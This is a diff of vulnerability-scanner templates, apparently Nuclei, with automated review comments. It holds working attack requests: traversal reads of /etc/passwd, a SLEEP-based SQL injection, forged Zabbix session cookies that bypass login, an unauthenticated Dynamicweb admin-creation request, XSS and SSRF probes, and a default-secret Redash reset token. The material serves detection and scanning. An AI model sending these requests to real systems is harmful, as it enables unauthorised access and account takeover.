name: Qards Plugin - Stored XSS and SSRF
author: pussycat0x
severity: medium
description: The Qards plugin through 2017-10-11 for WordPress has XSS via a remote document specified in the url parameter to html2canvasproxy.php
reference:
- https://wpscan.com/vulnerability/8934
- https://wpscan.com/vulnerability/454a0ce3-ecfe-47fc-a282-5caa51370645
- https://nvd.nist.gov/vuln/detail/CVE-2017-18598
tags: cve,cve2017,wordpress,ssrf,xss,wp-plugin,oast
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2017-18598
cwe-id: CWE-79
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/qards/html2canvasproxy.php?url=https://{{interactsh-url}}'
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
- type: word
part: body
words:
- "console.log"
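Review bot: The name advertises `Stored XSS and SSRF`, but the description only says the plugin `has XSS via a remote document specified in the url parameter`, and the request exercises an out-of-band fetch, so nothing in the template supports the word "Stored". Rename to something the body supports, e.g. `name: Qards Plugin - Cross-Site Scripting and SSRF via html2canvasproxy.php`, and end the description with a period. The `url=https://{{interactsh-url}}` choice presumably relies on the proxy following HTTPS; if `html2canvasproxy.php` only fetches plain HTTP the interaction never fires, so confirm or use `http://`.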

@ -0,0 +1,34 @@
id: CVE-2018-9161
info:
name: PrismaWEB - Credentials Disclosure
author: gy741
severity: critical
description: The vulnerability exists due to the disclosure of hard-coded credentials allowing an attacker to effectively bypass authentication of PrismaWEB with administrator privileges. The credentials can be disclosed by simply navigating to the login_par.js JavaScript page that holds the username and password for the management interface that are being used via the Login() function in /scripts/functions_cookie.js script.
reference:
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5453.php
- https://nvd.nist.gov/vuln/detail/CVE-2018-9161
tags: cve,cve2018,prismaweb,exposure
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
cve-id: CVE-2018-9161
cwe-id: CWE-798
requests:
- method: GET
path:
- "{{BaseURL}}/user/scripts/login_par.js"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'txtChkUser'
- 'txtChkPassword'
condition: and
- type: status
status:
- 200
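Review bot: The matchers only prove that the strings `txtChkUser` and `txtChkPassword` occur in a 200 response to `/user/scripts/login_par.js`, which establishes the file exists but not that it carries the hard-coded credentials the description promises. If the file assigns those identifiers as the advisory describes, a regex matcher such as `txtChkUser\s*=` would tighten the check, and an extractor on the same pattern would surface the values for triage instead of leaving the analyst to fetch the file by hand. As written, a stripped or empty stub that still mentions the names is flagged as a critical finding.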

@ -1,10 +1,11 @@
id: CVE-2018-9205
info:
name: Drupal avatar_uploader v7.x-1.0-beta8 - Arbitrary File Disclosure
name: Drupal avatar_uploader v7.x-1.0-beta8 Local File Inclusion
author: daffainfo
severity: high
description: Vulnerability in avatar_uploader v7.x-1.0-beta8 , The code in view.php doesnt verify users or sanitize the file path.
description: In avatar_uploader v7.x-1.0-beta8 the view.php program doesn't restrict file paths, allowing unauthenticated users to retrieve arbitrary files.
remediation: Upgrade to the latest version of avatar_uploader.
reference:
- https://www.exploit-db.com/exploits/44501
- https://nvd.nist.gov/vuln/detail/CVE-2018-9205
@ -30,3 +31,5 @@ requests:
- type: status
status:
- 200
# Enhanced by cs on 2022/02/25
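Review bot: The rename to `Drupal avatar_uploader v7.x-1.0-beta8 Local File Inclusion` drops the ` - ` separator every other template name in this commit uses, and relabels what the description calls retrieving arbitrary files as an inclusion, which implies execution the description does not claim. Keep the earlier wording with the separator, `name: Drupal avatar_uploader v7.x-1.0-beta8 - Arbitrary File Disclosure`, and leave the `lfi` tag to carry the category. The new remediation line `Upgrade to the latest version of avatar_uploader.` is fine but could cite a fixed release if the advisory names one.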

@ -0,0 +1,33 @@
id: CVE-2019-9726
info:
name: Homematic CCU3 - Directory Traversal / Arbitrary File Read
author: 0x_Akoko
severity: high
description: Directory Traversal / Arbitrary File Read in eQ-3 AG Homematic CCU3 3.43.15 and earlier allows remote attackers to read arbitrary files of the device's filesystem. This vulnerability can be exploited by unauthenticated attackers with access to the web interface.
reference:
- https://atomic111.github.io/article/homematic-ccu3-fileread
- https://www.cvedetails.com/cve/CVE-2019-9726
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2019-9726
cwe-id: CWE-22
tags: cve,cve2019,homematic,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/.%00./.%00./etc/passwd"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- "bin:.*:0:0:"
condition: or
- type: status
status:
- 200
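Review bot: The new template references `https://www.cvedetails.com/cve/CVE-2019-9726` while every other file in this commit is being moved from cvedetails to the NVD entry; add `- https://nvd.nist.gov/vuln/detail/CVE-2019-9726` so it does not need the same cleanup later. The second regex `bin:.*:0:0:` is also suspect: the `bin` account is not normally uid/gid 0, so it will rarely match a real passwd file and adds nothing over `root:.*:0:0:`; if it is meant to catch a different file layout, a comment saying which one would help.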

@ -1,7 +1,7 @@
id: CVE-2019-9955
info:
name: CVE-2019-9955 Zyxel XSS
name: Zyxel Reflected Cross-site Scripting
author: pdteam
severity: medium
tags: cve,cve2019,xss,zyxel
@ -21,7 +21,8 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/?mobile=1&mp_idx=%22;alert(%271%27);//"
- "{{BaseURL}}/?mp_idx=%22;alert(%271%27);//"
matchers:
- type: word
part: body
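Review bot: The request path loses the `mobile=1` parameter, changing the PoC from `/?mobile=1&mp_idx=…` to `/?mp_idx=…` with no note on why. If the reflection of `mp_idx` only happens on the mobile login page, the template stops detecting affected Zyxel devices; confirm against the advisory and, if both variants reflect, keep both paths in the list so either page triggers the match. The matchers that follow are outside this hunk.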

@ -4,9 +4,9 @@ info:
name: Apache Cocoon 2.1.12 XML Injection
author: pikpikcu
severity: high
tags: cve,cve2020,apache,xml,cocoon
description: |
When using the StreamGenerator, the code parse a user-provided XML. A specially crafted XML, including external system entities, could be used to access any file on the server system.
tags: cve,cve2020,apache,xml,cocoon,xxe
description: When using the StreamGenerator, the code parses a user-provided XML. A specially crafted XML, including external system entities, can be used to access any file on the server system.
remediation: Upgrade to Apache Cocon 2.1.13 or later.
reference: https://lists.apache.org/thread.html/r77add973ea521185e1a90aca00ba9dae7caa8d8b944d92421702bb54%40%3Cusers.cocoon.apache.org%3E
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
@ -38,3 +38,5 @@ requests:
- type: status
status:
- 200
# Enhanced by cs on 2022/02/25
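Review bot: The remediation line misspells the product: `Upgrade to Apache Cocon 2.1.13 or later.` should read `remediation: Upgrade to Apache Cocoon 2.1.13 or later.` Adding the `xxe` tag fits the description, which is an external-entity file read; the NVD entry for this CVE would be a useful second reference alongside the mailing-list thread.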

@ -1,10 +1,10 @@
id: CVE-2021-20158
info:
name: Trendnet AC2600 TEW-827DRU - Unauthenticated Admin Password change
name: Trendnet AC2600 TEW-827DRU - Unauthenticated Admin Password Change
author: gy741
severity: critical
description: Trendnet AC2600 TEW-827DRU version 2.08B01 contains an authentication bypass vulnerability. It is possible for an unauthenticated, malicous actor to force the change of the admin password due to a hidden administrative command.
description: Trendnet AC2600 TEW-827DRU version 2.08B01 contains an authentication bypass vulnerability. It is possible for an unauthenticated, malicious actor to force change the admin password due to a hidden administrative command.
reference:
- https://www.tenable.com/security/research/tra-2021-54
- https://nvd.nist.gov/vuln/detail/CVE-2021-20150
@ -49,3 +49,5 @@ requests:
part: header
words:
- "text/html"
# Enhanced by cs on 2022/02/25
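Review bot: The template id is `CVE-2021-20158` but the reference list still points at `https://nvd.nist.gov/vuln/detail/CVE-2021-20150`, presumably a sibling issue from the same Tenable advisory, so the link does not back the finding it is attached to. Change it to `- https://nvd.nist.gov/vuln/detail/CVE-2021-20158` (the `tra-2021-54` advisory can stay since it covers the product as a whole). The description rewrite is otherwise fine; `force change the admin password` reads better as `force a change of the admin password`.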

@ -0,0 +1,37 @@
id: CVE-2021-24762
info:
name: Perfect Survey WordPress plugin before 1.5.2 SQLI
author: cckuailong
severity: critical
description: The Perfect Survey WordPress plugin before 1.5.2 does not validate and escape the question_id GET parameter before using it in a SQL statement in the get_question AJAX action, allowing unauthenticated users to perform SQL injection.
reference:
- https://www.exploit-db.com/exploits/50766
- https://github.com/cckuailong/reapoc/tree/main/2021/CVE-2021-24762/vultarget
- https://nvd.nist.gov/vuln/detail/CVE-2021-24762
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-24762
cwe-id: CWE-89
tags: cve,cve2021,sqli,wp,wordpress,wp-plugin,unauth
requests:
- method: GET
path:
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=get_question&question_id=1%20AND%20(SELECT%207242%20FROM%20(SELECT(SLEEP(4)))HQYx)"
matchers-condition: and
matchers:
- type: status
status:
- 404
- type: word
part: header
words:
- "wp-ps-session"
- type: dsl
dsl:
- 'duration>=4'
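Review bot: Detection rests on a single request taking `duration>=4` seconds after a `SLEEP(4)`, so a slow or overloaded host trips the threshold with no injection at all, and the `404` status plus the `wp-ps-session` header only show the plugin is present. A baseline request without the `SLEEP` whose duration is compared against the payload request, or at least a longer sleep so ordinary latency cannot reach the threshold, would cut the false positives. The `tags` line also carries both `wp` and `wordpress`; the other WordPress templates in this commit use `wordpress,wp-plugin`, so `tags: cve,cve2021,sqli,wordpress,wp-plugin,unauth` keeps it consistent.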

@ -1,10 +1,11 @@
id: CVE-2021-29490
info:
name: Jellyfin <10.7.2 SSRF
name: Jellyfin 10.7.2 SSRF
author: alph4byt3
severity: medium
description: Jellyfin is a free software media system that provides media from a dedicated server to end-user devices via multiple apps. Verions prior to 10.7.3 vulnerable to unauthenticated Server-Side Request Forgery (SSRF) attacks via the imageUrl parameter.
description: Jellyfin is a free software media system. Versions 10.7.2 and below are vulnerable to unauthenticated Server-Side Request Forgery (SSRF) attacks via the imageUrl parameter.
remediation: Upgrade to version 10.7.3 or newer. As a workaround, disable external access to the API endpoints "/Items/*/RemoteImages/Download", "/Items/RemoteSearch/Image" and "/Images/Remote".
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-29490
- https://github.com/jellyfin/jellyfin/security/advisories/GHSA-rgjw-4fwc-9v96
@ -23,6 +24,8 @@ requests:
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
# Enhanced by cs on 2022/02/25
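Review bot: The new `name: Jellyfin 10.7.2 SSRF` reads as if only 10.7.2 is affected, while the rewritten description says 10.7.2 and below; `name: Jellyfin <=10.7.2 SSRF` keeps the two consistent (the old `<10.7.2` was itself off by one against the description's "prior to 10.7.3"). The added `remediation` line is a good addition; the second hunk only re-indents a comment.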


@ -0,0 +1,39 @@
id: CVE-2021-41192
info:
name: Redash Setup Configuration - Default secrets
author: bananabr
severity: medium
description: If an admin sets up Redash versions <=10.0 and prior without explicitly specifying the `REDASH_COOKIE_SECRET` or `REDASH_SECRET_KEY` environment variables, a default value is used for both that is the same across all installations. In such cases, the instance is vulnerable to attackers being able to forge sessions using the known default value.
reference:
- https://hackerone.com/reports/1380121
- https://github.com/getredash/redash/security/advisories/GHSA-g8xr-f424-h2rv
- https://nvd.nist.gov/vuln/detail/CVE-2021-41192
metadata:
shodan-query: http.favicon.hash:698624197
tags: cve,cve2021,redash,auth-bypass
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
cvss-score: 6.50
cve-id: CVE-2021-41192
cwe-id: CWE-1188
requests:
- method: GET
path:
- "{{BaseURL}}/reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs"
- "{{BaseURL}}/redash/reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Enter your new password:"
- "redash"
condition: and
- type: status
status:
- 200
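Review bot: The `description` says "versions <=10.0 and prior", which is doubly qualified; `versions 10.0 and earlier` reads cleanly. Separately, `tags` sits between `metadata` and `classification` here, while CVE-2021-24762 in this commit puts `classification` before `tags`; mappings are unordered so nothing breaks, but one key order across the new templates makes future diffs easier to read (the block added to CVE-2022-25323 has the same ordering). The hard-coded `/reset/` token is also undocumented; a comment stating what it is, hedged if unsure (`# presumably a reset token signed with the default secret — confirm`), would tell a maintainer what the match depends on.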


@ -4,8 +4,8 @@ info:
name: Wordpress Profile Builder Plugin XSS
author: dhiyaneshDk
severity: medium
reference:
- https://www.wordfence.com/blog/2022/02/reflected-cross-site-scripting-vulnerability-patched-in-wordpress-profile-builder-plugin/
description: The Profile Builder &#8211; User Profile & User Registration Forms WordPress plugin is vulnerable to Cross-Site Scripting due to insufficient escaping and sanitization of the site_url parameter found in the ~/assets/misc/fallback-page.php file which allows attackers to inject arbitrary web scripts onto a pages that executes whenever a user clicks on a specially crafted link by an attacker. This affects versions up to and including 3.6.1
reference: https://www.wordfence.com/blog/2022/02/reflected-cross-site-scripting-vulnerability-patched-in-wordpress-profile-builder-plugin/
tags: cve,cve2022,wordpress,xss,wp-plugin
requests:
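Review bot: The new `description` carries the raw HTML entity `&#8211;` and the phrase "onto a pages that executes"; it should read `The Profile Builder – User Profile & User Registration Forms WordPress plugin … inject arbitrary web scripts into a page that execute whenever a user clicks on a link crafted by an attacker.` The `reference` key was also flattened from a list to a plain scalar; the other templates in this commit keep the list form, and keeping it here avoids format churn when a second reference is added.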


@ -0,0 +1,47 @@
id: CVE-2022-21371
info:
name: Oracle WebLogic Server LFI
author: paradessia,narluin
severity: high
description: Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware. Supported versions that are affected are 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts).
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2022-21371
- https://gist.github.com/picar0jsu/f3e32939153e4ced263d3d0c79bd8786
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
cve-id: CVE-2022-21371
tags: cve,cve2022,lfi,weblogic,oracle
requests:
- method: GET
raw:
- |+
GET {{path}} HTTP/1.1
Host: {{Hostname}}
payloads:
path:
- .//WEB-INF/weblogic.xml
- .//WEB-INF/web.xml
unsafe: true
stop-at-first-match: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'contains(body, "<web-app") && contains(body, "</web-app>")'
- 'contains(body, "<weblogic-web-app") && contains(body, "</weblogic-web-app>")'
condition: or
- type: dsl
dsl:
- 'contains(all_headers, "text/xml")'
- 'contains(all_headers, "application/xml")'
condition: or
- type: status
status:
- 200
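Review bot: The `classification` block has no `cwe-id`, unlike CVE-2021-24762 in this commit; for this file-read issue the NVD entry should be checked and the CWE added (path traversal is normally `cwe-id: CWE-22`). `unsafe: true` on the raw request has no explanation — presumably it keeps the HTTP client from normalizing the `.//` prefix in `{{path}}` — and a comment such as `# unsafe: keep the raw ".//" path from being normalized` would save the next maintainer a guess. `cvss-score: 7.50` parses as 7.5 either way, but the other templates write `9.8`/`5.3`, so `7.5` matches the file style.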


@ -0,0 +1,39 @@
id: CVE-2022-23131
info:
name: Zabbix - SAML SSO Authentication Bypass
author: For3stCo1d
severity: critical
description: In the case of instances where the SAML SSO authentication is enabled (non-default), session data can be modified by a malicious actor, because a user login stored in the session was not verified.
reference:
- https://blog.sonarsource.com/zabbix-case-study-of-unsafe-session-storage
- https://nvd.nist.gov/vuln/detail/CVE-2022-23131
- https://github.com/1mxml/CVE-2022-23131
metadata:
shodan-query: http.favicon.hash:892542951
fofa-query: app="ZABBIX-监控系统" && body="saml"
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
cvss-score: 9.8
cve-id: CVE-2022-23131
tags: cve,cve2022,zabbix,auth-bypass,saml,sso
requests:
- method: GET
path:
- "{{BaseURL}}/zabbix/index_sso.php"
- "{{BaseURL}}/index_sso.php"
headers:
Cookie: "zbx_session=eyJzYW1sX2RhdGEiOnsidXNlcm5hbWVfYXR0cmlidXRlIjoiQWRtaW4ifSwic2Vzc2lvbmlkIjoiIiwic2lnbiI6IiJ9"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: status
status:
- 302
- type: dsl
dsl:
- "contains(tolower(all_headers), 'location: zabbix.php?action=dashboard.view')"


@ -0,0 +1,39 @@
id: CVE-2022-23134
info:
name: Zabbix Setup Configuration - Unauthenticated Access
author: bananabr
severity: medium
description: After the initial setup process, some steps of setup.php file are reachable not only by super-administrators, but by unauthenticated users as well. Malicious actor can pass step checks and potentially change the configuration of Zabbix Frontend.
reference:
- https://blog.sonarsource.com/zabbix-case-study-of-unsafe-session-storage
- https://nvd.nist.gov/vuln/detail/CVE-2022-23134
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
cvss-score: 5.3
cve-id: CVE-2022-23134
tags: cve,cve2022,zabbix,auth-bypass
requests:
- method: GET
path:
- "{{BaseURL}}/zabbix/setup.php"
- "{{BaseURL}}/setup.php"
headers:
Cookie: "zbx_session=eyJzZXNzaW9uaWQiOiJJTlZBTElEIiwiY2hlY2tfZmllbGRzX3Jlc3VsdCI6dHJ1ZSwic3RlcCI6Niwic2VydmVyQ2hlY2tSZXN1bHQiOnRydWUsInNlcnZlckNoZWNrVGltZSI6MTY0NTEyMzcwNCwic2lnbiI6IklOVkFMSUQifQ%3D%3D"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
words:
- "Database"
- "host"
- "port"
- "Zabbix"
condition: and
- type: status
status:
- 200


@ -9,6 +9,11 @@ info:
- https://github.com/awillix/research/blob/main/cve/CVE-2022-25323.md
- https://nvd.nist.gov/vuln/detail/CVE-2022-25323
tags: xss,cve,cve2022,zerof
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2022-25323
cwe-id: CWE-79
requests:
- method: GET


@ -0,0 +1,36 @@
id: CVE-2022-25369
info:
name: Dynamicweb 9.5.0 - 9.12.7 Unauthenticated Admin addition
author: pdteam
severity: critical
reference: https://blog.assetnote.io/2022/02/20/logicflaw-dynamicweb-rce/
metadata:
shodan-query: http.component:"Dynamicweb"
tags: cve,cve2022,dynamicweb,rce,unauth
requests:
- method: GET
path:
- "{{BaseURL}}/Admin/Access/Setup/Default.aspx?Action=createadministrator&adminusername={{rand_base(6)}}&adminpassword={{rand_base(6)}}&adminemail=test@test.com&adminname=test"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"Success": true'
- '"Success":true'
condition: or
- type: word
part: header
words:
- 'application/json'
- 'ASP.NET_SessionId'
condition: and
case-insensitive: true
- type: status
status:
- 200
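Review bot: The template has no `description` and no `classification` block, and the request it sends is state-changing: a successful match means a new administrator account with `{{rand_base(6)}}` credentials now exists on the target. A `description` should say so, e.g. `description: Dynamicweb 9.5.0 through 9.12.7 allows unauthenticated creation of an administrator account via Admin/Access/Setup/Default.aspx; a positive match leaves a new admin user on the target.`, so operators know to remove the account after a scan. The `rce` tag does not describe what this request does; unless the chain in the referenced write-up is meant to be implied, `auth-bypass` as used by CVE-2021-41192 in this commit is the more accurate tag.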


@ -4,8 +4,11 @@ info:
name: Axigen Web Admin
author: dhiyaneshDk
severity: info
description: This template determines if Axigen Web Admin is running.
reference:
- https://www.axigen.com/
metadata:
shodan-query: 'http.title:"Axigen&nbsp;WebAdmin"'
shodan-query: 'http.title:"Axigen WebAdmin"'
tags: axigen,panel
requests:
@ -17,8 +20,10 @@ requests:
matchers:
- type: word
words:
- '<title>Axigen&nbsp;WebAdmin</title>'
- '<title>Axigen WebAdmin</title>'
- type: status
status:
- 200
# Enhanced by cs on 2022/02/25
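Review bot: The word matcher now looks for `<title>Axigen WebAdmin</title>` with a plain space where the previous version matched `&nbsp;`; if any Axigen build still emits the entity, it stops being detected. Listing both strings under `words:` with `condition: or` keeps coverage of either form, assuming the change was made from an observed response rather than by hand; the same applies to the `shodan-query` edit in the first hunk.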


@ -4,6 +4,9 @@ info:
name: Axigen WebMail
author: dhiyaneshDk
severity: info
description: This template determines if Axigen Webmail is running.
reference:
- https://www.axigen.com/
metadata:
shodan-query: 'http.title:"Axigen WebMail"'
tags: axigen,panel
@ -22,3 +25,5 @@ requests:
- type: status
status:
- 200
# Enhanced by cs on 2022/02/25


@ -0,0 +1,35 @@
id: dynamicweb-panel
info:
name: Dynamicweb Login Panel
author: pdteam
severity: info
reference: https://www.dynamicweb.com
metadata:
shodan-query: http.component:"Dynamicweb"
tags: panel,dynamicweb
requests:
- raw:
- |
GET /Admin/Access/default.aspx HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip, deflate
matchers-condition: and
matchers:
- type: word
part: body
words:
- Dynamicweb
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- version ([0-9.]+)
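Review bot: `info` has no `description`; most detect templates in this commit omit it too, but this panel is referenced by the new dynamicweb workflow together with CVE-2022-25369 and deserves one line, e.g. `description: Detects the Dynamicweb administration login page and extracts the version string reported in the page body.` The `reference` key is a plain scalar here while the CVE templates use a list; either works, but one form across the commit reads better.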


@ -0,0 +1,29 @@
id: homematic-panel
info:
name: Homematic Panel Detect
author: princechaddha
severity: info
metadata:
shodan-query: http.html:"Homematic"
tags: panel,homematic,iot
requests:
- method: GET
path:
- "{{BaseURL}}"
redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- "HomeMatic Logo"
- "<title>HomeMatic WebUI</title>"
condition: or
- type: status
status:
- 200


@ -0,0 +1,29 @@
id: netflix-conductor-ui
info:
name: Netflix Conductor UI Detection
author: c-sh0
severity: info
metadata:
shodan-query: http.title:"Conductor UI", http.title:"Workflow UI"
tags: webserver,netflix,conductor,panel
requests:
- method: GET
path:
- "{{BaseURL}}"
redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- '<title>Conductor UI</title>'
- '<title>Workflow UI</title>'
condition: or


@ -0,0 +1,31 @@
id: phoronix-panel
info:
name: Phoronix Test Suite Panel Detect
author: pikpikcu
severity: info
metadata:
shodan-query: http.title:"phoronix-test-suite"
tags: panel,phoronix
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: regex
regex:
- '<title>Phoronix Test Suite (.*) - Phoromatic - Welcome</title>'
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- "<title>Phoronix Test Suite (.*) - Phoromatic - Welcome</title>"


@ -0,0 +1,27 @@
id: raspberrymatic-panel
info:
name: RaspberryMatic Panel Detect
author: princechaddha
severity: info
metadata:
shodan-query: http.favicon.hash:-578216669
tags: panel,raspberrymatic,iot
requests:
- method: GET
path:
- "{{BaseURL}}/login.htm"
redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>RaspberryMatic WebUI</title>"
- type: status
status:
- 200


@ -0,0 +1,27 @@
id: redash-panel
info:
name: Redash Panel Detect
author: princechaddha
severity: info
metadata:
shodan-query: http.favicon.hash:698624197
tags: panel,redash
requests:
- method: GET
path:
- "{{BaseURL}}/login"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>Login to Redash</title>"
- "<title>Login | Redash</title>"
condition: or
- type: status
status:
- 200


@ -1,37 +1,44 @@
id: zip-backup-files
info:
name: Compressed Web File
author: Toufik Airane,dwisiswant0
name: Compressed Backup File
author: toufik-airane,dwisiswant0,ffffffff0x
severity: medium
tags: exposure,backup
requests:
- method: GET
path:
- "{{BaseURL}}/{{Hostname}}.7z"
- "{{BaseURL}}/{{Hostname}}.bz2"
- "{{BaseURL}}/{{Hostname}}.gz"
- "{{BaseURL}}/{{Hostname}}.lz"
- "{{BaseURL}}/{{Hostname}}.rar"
- "{{BaseURL}}/{{Hostname}}.tar.gz"
- "{{BaseURL}}/{{Hostname}}.xz"
- "{{BaseURL}}/{{Hostname}}.zip"
- "{{BaseURL}}/{{Hostname}}.z"
- "{{BaseURL}}/{{Hostname}}.tar.z"
- "{{BaseURL}}/{{Hostname}}.db"
- "{{BaseURL}}/{{Hostname}}.sqlite"
- "{{BaseURL}}/{{Hostname}}.sqlitedb"
- "{{BaseURL}}/{{Hostname}}.sql.7z"
- "{{BaseURL}}/{{Hostname}}.sql.bz2"
- "{{BaseURL}}/{{Hostname}}.sql.gz"
- "{{BaseURL}}/{{Hostname}}.sql.lz"
- "{{BaseURL}}/{{Hostname}}.sql.rar"
- "{{BaseURL}}/{{Hostname}}.sql.tar.gz"
- "{{BaseURL}}/{{Hostname}}.sql.xz"
- "{{BaseURL}}/{{Hostname}}.sql.zip"
- "{{BaseURL}}/{{Hostname}}.sql.z"
- "{{BaseURL}}/{{Hostname}}.sql.tar.z"
- "{{BaseURL}}/{{FQDN}}.{{EXT}}" # www.example.com
- "{{BaseURL}}/{{RDN}}.{{EXT}}" # example.com
- "{{BaseURL}}/{{DN}}.{{EXT}}" # example
attack: pitchfork
payloads:
EXT:
- "7z"
- "bz2"
- "gz"
- "lz"
- "rar"
- "tar.gz"
- "xz"
- "zip"
- "z"
- "tar.z"
- "db"
- "sqlite"
- "sqlitedb"
- "sql.7z"
- "sql.bz2"
- "sql.gz"
- "sql.lz"
- "sql.rar"
- "sql.tar.gz"
- "sql.xz"
- "sql.zip"
- "sql.z"
- "sql.tar.z"
max-size: 500 # Size in bytes - Max Size to read from server response
matchers-condition: and
@ -59,4 +66,4 @@ requests:
- type: status
status:
- 200
- 200
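Review bot: `attack: pitchfork` is declared with a single payload set (`EXT`), where pitchfork and the default batteringram iterate identically, so the line either anticipates a second payload set or is a leftover; a comment such as `# single payload set: attack type is a no-op here` or dropping the key would make the intent clear. The `{{FQDN}}`/`{{RDN}}`/`{{DN}}` paths replace the old `{{Hostname}}` form, which can include a port suffix, and the inline comments on those three lines are a good addition.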


@ -0,0 +1,44 @@
id: netflix-conductor-version
info:
name: Netflix Conductor Version Detection
author: c-sh0
severity: info
description: Obtain netflix conductor version information
reference:
- https://github.com/Netflix/conductor/blob/v1.6.0-rc1/ui/src/server.js#L17
- https://github.com/Netflix/conductor/blob/v3.1.0/rest/src/main/java/com/netflix/conductor/rest/controllers/AdminResource.java#L42
metadata:
shodan-query: http.title:"Conductor UI", http.title:"Workflow UI"
tags: tech,netflix,conductor,api
requests:
- method: GET
path:
- "{{BaseURL}}/api/admin/config"
- "{{BaseURL}}/api/sys"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: header
words:
- 'application/json'
- type: word
part: body
words:
- 'CONDUCTOR_'
case-insensitive: true
extractors:
- type: regex
group: 1
regex:
- 'conductor\-server\-([0-9.]+)\-'
- '"version":"([0-9.]+)\-'
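Review bot: The first path requests `/api/admin/config` and the body matcher looks for `CONDUCTOR_` strings, so a match presumably means the admin config endpoint answered a request with no credentials and returned server configuration, which is more than the "version information" the `info`-severity description states. The description should say what a match means, e.g. `description: Extracts the Netflix Conductor server version from /api/sys or /api/admin/config; a 200 from /api/admin/config also means the admin API answered without authentication.`, and whether that deserves a `misconfig` or `exposure` tag is worth a look. The extractor regexes escape hyphens (`\-`); RE2 accepts it, but `conductor-server-([0-9.]+)-` is the plainer form.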


@ -0,0 +1,20 @@
id: empirecms-detect
info:
name: EmpireCMS Detect
author: princechaddha
severity: info
metadata:
shodan-query: http.html:EmpireCMS
tags: tech,empirecms
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: regex
part: body
regex:
- '<meta (.*)EmpireCMS(.*)>'
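Review bot: The regex `<meta (.*)EmpireCMS(.*)>` uses greedy `.*` on both sides, so it matches from the first `<meta ` on a line to the last `>` on that line as long as `EmpireCMS` appears anywhere between, including across several unrelated tags; `<meta[^>]*EmpireCMS[^>]*>` restricts the match to a single meta tag. The template also has no status matcher and no `matchers-condition`, unlike the other detect templates added in this commit; adding the usual `status`/`200` matcher with `matchers-condition: and` keeps it consistent with them.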


@ -0,0 +1,25 @@
id: snipeit-panel
info:
name: Snipe-IT Panel Detect
author: pikpikcu
severity: info
metadata:
shodan-query: http.favicon.hash:431627549
tags: panel,snipeit
requests:
- method: GET
path:
- "{{BaseURL}}/login"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "window.snipeit"
- type: status
status:
- 200


@ -9,13 +9,13 @@ info:
- https://shufflingbytes.com/posts/hacking-goip-gsm-gateway/
- http://www.hybertone.com/uploadfile/download/20140304125509964.pdf
- http://en.dbltek.com/latestfirmwares.html
tags: gsm,goip,lfi
tags: gsm,goip,lfi,iot
requests:
- method: GET
path:
- "{{BaseURL}}/default/en_US/frame.html?content=..%2f..%2f..%2f ..%2f..%2f..%2f..%2fetc%2fpasswd"
- "{{BaseURL}}/default/en_US/frame.A100.html?sidebar=..%2f..%2f ..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
- "{{BaseURL}}/default/en_US/frame.html?content=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
- "{{BaseURL}}/default/en_US/frame.A100.html?sidebar=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
matchers:
